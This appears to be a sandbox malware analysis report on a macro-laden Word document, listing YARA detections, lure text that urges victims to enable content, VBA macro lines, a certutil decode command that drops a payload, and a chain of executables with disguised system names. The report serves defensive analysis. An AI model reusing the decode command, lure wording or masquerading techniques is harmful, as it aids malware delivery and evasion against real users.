                      Source: Yara matchFile source: 00000008.00000002.2284485202.0000000000906000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.2277604506.0000000000908000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.2321112470.0000000000578000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2306168879.0000000000538000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2296618832.00000000005D6000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2310473820.0000000000648000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2315225501.0000000000538000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.2301449687.0000000000338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2305771628.00000000002F4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.2287962636.00000000005E8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2309893480.00000000004F4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2296898550.0000000000608000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2314627073.0000000000646000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2301536313.00000000005C4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.2292414535.00000000005D8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 11.2.NlsLexicons0416.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.tmp_e473b4.exe.7a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.jsproxy.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.apds.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.WPDShextAutoplay.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rasadhlp.exe.320000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.shellstyle.exe.3d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.upnp.exe.310000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.mobsync.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.dllhost.exe.480000.2.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_003225E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree,17_2_003225E0

                      System Summary:

                      barindex
                      Malicious sample detected (through community Yara rule)Show sources
                      Source: 00000006.00000002.2276740698.00000000004BD000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: Enable editing" from the yellow bar above. QNN q 2 Once you have enabled editing, please click
                      Source: Screenshot number: 4Screenshot OCR: Enable content" on the yellow bar above. Em> "this document is completely safety to open Page: 1 o
                      Source: Document image extraction number: 0Screenshot OCR: Enable editing' from the yellow bar 2 Once you have enabled editing, please click "Enable content'
                      Source: Document image extraction number: 0Screenshot OCR: Enable content' on the yellow bar above. *this document is completely safety to open
                      Document contains an embedded VBA macro with suspicious stringsShow sources
                      Source: sample1.docOLE, VBA macro line: Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
                      Source: sample1.docOLE, VBA macro line: Private Declare Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00620400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,8_2_00620400
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_00290400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,9_2_00290400
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: 10_2_002C0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,10_2_002C0400
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: 11_2_003D0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,11_2_003D0400
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: 12_2_002B0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,12_2_002B0400
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: 13_2_00290400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,13_2_00290400
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: 14_2_00470400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,14_2_00470400
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: 15_2_003D0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,15_2_003D0400
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: 16_2_00300400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,16_2_00300400
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00310400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,17_2_00310400
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_002A8E80 CloseServiceHandle,OpenSCManagerW,DeleteService,OpenServiceW,OpenServiceW,CloseServiceHandle,9_2_002A8E80
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cer5AC.tmpJump to behavior
                      Source: C:\Windows\System32\certutil.exeFile deleted: C:\Windows\cer5AC.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040314D8_2_0040314D
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_004052D48_2_004052D4
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_004093508_2_00409350
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00406DA88_2_00406DA8
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A78B08_2_007A78B0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A1C708_2_007A1C70
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A65E08_2_007A65E0
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_002A1C709_2_002A1C70
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_002A78B09_2_002A78B0
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: 9_2_002A65E09_2_002A65E0
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: 10_2_003D1C7010_2_003D1C70
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: 10_2_003D78B010_2_003D78B0
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: 10_2_003D65E010_2_003D65E0
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: 11_2_003E1C7011_2_003E1C70
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: 11_2_003E78B011_2_003E78B0
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: 11_2_003E65E011_2_003E65E0
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: 12_2_002C1C7012_2_002C1C70
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: 12_2_002C78B012_2_002C78B0
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: 12_2_002C65E012_2_002C65E0
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: 13_2_002A1C7013_2_002A1C70
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: 13_2_002A78B013_2_002A78B0
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: 13_2_002A65E013_2_002A65E0
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: 14_2_00481C7014_2_00481C70
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: 14_2_004865E014_2_004865E0
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: 14_2_004878B014_2_004878B0
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: 15_2_003E1C7015_2_003E1C70
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: 15_2_003E78B015_2_003E78B0
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: 15_2_003E65E015_2_003E65E0
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: 16_2_00311C7016_2_00311C70
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: 16_2_003178B016_2_003178B0
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: 16_2_003165E016_2_003165E0
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00321C7017_2_00321C70
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_003278B017_2_003278B0
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_003265E017_2_003265E0
                      Source: sample1.docOLE, VBA macro line: Private Sub Document_Close()
                      Source: sample1.docOLE, VBA macro line: Form_Close
                      Source: sample1.docOLE, VBA macro line: Private Sub Form_Close()
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_CloseName: Document_Close
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Form_CloseName: Form_Close
                      Source: sample1.docOLE indicator, VBA macros: true
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Ksh1.pdf FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC
                      Source: 00000006.00000002.2276740698.00000000004BD000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: tmp_e473b4.exe, 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp, WPDShextAutoplay.exe, 00000009.00000002.2287915856.000000000042A000.00000004.00020000.sdmp, shellstyle.exe, 0000000A.00000002.2292166062.000000000042A000.00000004.00020000.sdmp, NlsLexicons0416.exe, 0000000B.00000002.2295978823.000000000042A000.00000004.00020000.sdmp, mobsync.exe, 0000000C.00000002.2301420992.000000000042A000.00000004.00020000.sdmp, jsproxy.exe, 0000000D.00000002.2306645295.000000000042A000.00000004.00020000.sdmpBinary or memory string: @*\AC:\aseb\Aseb.vbp
                      Source: tmp_e473b4.exe, WPDShextAutoplay.exe, 00000009.00000000.2281266854.0000000000401000.00000020.00020000.sdmp, shellstyle.exe, 0000000A.00000002.2291949896.0000000000401000.00000020.00020000.sdmp, NlsLexicons0416.exe, 0000000B.00000002.2295942056.0000000000401000.00000020.00020000.sdmp, mobsync.exe, 0000000C.00000002.2301322153.0000000000401000.00000020.00020000.sdmp, jsproxy.exe, 0000000D.00000002.2306421139.0000000000401000.00000020.00020000.sdmpBinary or memory string: B*\AC:\aseb\Aseb.vbp
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@22/19@0/4
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,8_2_007A8970
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,9_2_002A8970
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,10_2_003D8970
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,11_2_003E8970
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,12_2_002C8970
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,13_2_002A8970
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeCode function: OpenSCManagerW,OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,14_2_00488970
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,15_2_003E8970
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,16_2_00318970
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeCode function: 17_2_00324C80 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,CloseHandle,CloseHandle,17_2_00324C80
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_007A5040 ChangeServiceConfig2W,OpenServiceW,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,8_2_007A5040
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ample1.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBBC0.tmpJump to behavior
                      Source: sample1.docOLE indicator, Word Document stream: true
                      Source: sample1.docOLE document summary: title field not present or empty
                      Source: C:\Windows\System32\certutil.exeConsole Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.9.5.9.7.2...............#.......(d..............H.......*.......q(.v............Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.....P.......d.......(.......j...............#.......(d..............H...............h...............Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .4.4.6.9.7.6.............#.......(d..............H.......,.......h...............Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.....P.......d.......(.......r...............#.......(d..............H...............h...............Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ................h............... .......(.P.....P.......d.......(.......v...............#........3......................b.......................Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ................h.......................(.P.....P.......d.......(.......z...............#........3..............................................Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\certutil.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\osk\rasadhlp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: sample1.docVirustotal: Detection: 61%
                      Source: sample1.docMetadefender: Detection: 45%
                      Source: sample1.docReversingLabs: Detection: 72%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\certutil.exe Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\mfc110fra\mobsync.exe C:\Windows\SysWOW64\mfc110fra\mobsync.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\capisp\jsproxy.exe C:\Windows\SysWOW64\capisp\jsproxy.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\riched20\dllhost.exe C:\Windows\SysWOW64\riched20\dllhost.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\KBDMLT47\apds.exe C:\Windows\SysWOW64\KBDMLT47\apds.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\osk\rasadhlp.exe C:\Windows\SysWOW64\osk\rasadhlp.exe
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess created: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exe C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeJump to behavior
                      Source: C:\Windows\SysWOW64\NlsData0018\WPDShextAutoplay.exeProcess created: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exe C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeJump to behavior
                      Source: C:\Windows\SysWOW64\DevicePairingHandler\shellstyle.exeProcess created: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exe C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeJump to behavior
                      Source: C:\Windows\SysWOW64\shsvcs\NlsLexicons0416.exeProcess created: C:\Windows\SysWOW64\mfc110fra\mobsync.exe C:\Windows\SysWOW64\mfc110fra\mobsync.exeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110fra\mobsync.exeProcess created: C:\Windows\SysWOW64\capisp\jsproxy.exe C:\Windows\SysWOW64\capisp\jsproxy.exeJump to behavior
                      Source: C:\Windows\SysWOW64\capisp\jsproxy.exeProcess created: C:\Windows\SysWOW64\riched20\dllhost.exe C:\Windows\SysWOW64\riched20\dllhost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\riched20\dllhost.exeProcess created: C:\Windows\SysWOW64\KBDMLT47\apds.exe C:\Windows\SysWOW64\KBDMLT47\apds.exeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDMLT47\apds.exeProcess created: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exe C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeJump to behavior
                      Source: C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0\upnp.exeProcess created: C:\Windows\SysWOW64\osk\rasadhlp.exe C:\Windows\SysWOW64\osk\rasadhlp.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00404803 push ecx; iretd 8_2_004047EF
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00404021 push ecx; retf 8_2_00404037
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00408839 push esi; iretd 8_2_00408893
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040610E push ecx; retf 8_2_0040611B
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040A12E push ecx; iretd 8_2_0040A12F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_004031D1 push ecx; iretd 8_2_00403233
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040721C pushad ; iretd 8_2_00407223
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040321E push ecx; iretd 8_2_00403233
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00403236 push ecx; iretd 8_2_00403287
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_00405AE2 push ecx; ret 8_2_00405B3F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_004062F6 push ebx; iretd 8_2_004062F7
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 8_2_0040AAF9 push esp; retf 8_2_0040AB17
